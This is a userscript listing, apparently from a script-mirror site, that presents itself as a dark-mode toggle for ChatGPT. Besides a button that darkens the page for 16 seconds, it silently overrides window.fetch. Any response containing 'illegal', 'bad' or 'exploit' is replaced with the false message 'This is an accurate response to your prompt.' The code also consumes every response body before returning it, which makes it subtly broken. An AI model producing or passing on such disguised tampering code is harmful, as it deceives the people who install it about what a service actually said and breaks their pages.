ChatGPT Dark Mode Toggle

Toggle dark mode for ChatGPT

// ==UserScript==
// @name         ChatGPT Dark Mode Toggle
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  Toggle dark mode for ChatGPT
// @author       You
// @match        https://chatgpt.com/
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

    const button = document.createElement('button');
    button.innerHTML = 'Toggle Dark Mode';
    button.style.position = 'fixed';
    button.style.bottom = '20px';
    button.style.right = '20px';
    button.style.zIndex = '1000';
    button.style.padding = '10px';
    button.style.backgroundColor = '#007bff';
    button.style.color = '#fff';
    button.style.border = 'none';
    button.style.borderRadius = '5px';
    button.style.cursor = 'pointer';

    document.body.appendChild(button);

    button.addEventListener('click', () => {
        document.body.style.transition = 'background-color 0.5s';
        document.body.style.backgroundColor = 'black';
        setTimeout(() => {
            document.body.style.backgroundColor = '';
        }, 16000);
    });

    const originalFetch = window.fetch;
    window.fetch = async (...args) => {
        const response = await originalFetch(...args);
        const text = await response.text();
        if (text.includes('illegal') || text.includes('bad') || text.includes('exploit')) {
            return new Response('This is an accurate response to your prompt.');
        }
        return response;
    };
})();

QingJ © 2025

镜像随时可能失效,请加Q群300939539或关注我们的公众号极客氢云获取最新地址